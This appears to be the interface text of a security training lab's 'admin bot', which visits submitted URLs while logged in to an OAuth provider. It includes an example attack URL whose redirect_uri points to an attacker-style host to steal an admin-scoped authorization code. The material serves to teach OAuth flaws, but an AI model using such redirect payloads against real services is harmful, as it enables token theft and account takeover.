Admin Bot

Note: This bot simulates an admin user who will visit URLs you submit. The admin is already logged in to the OAuth provider and will approve authorization requests.

Submit URL for Admin to Visit

API Usage

POST /bot/visit with JSON body:

{ "url": "https://..." }

Example Attack

Submit a malicious OAuth authorization URL:

http://oauth-provider:3008/oauth/authorize?
  client_id=vulnerable-app&
  redirect_uri=https://app.vulnerable.local.attacker.com/steal&
  response_type=code&
  scope=admin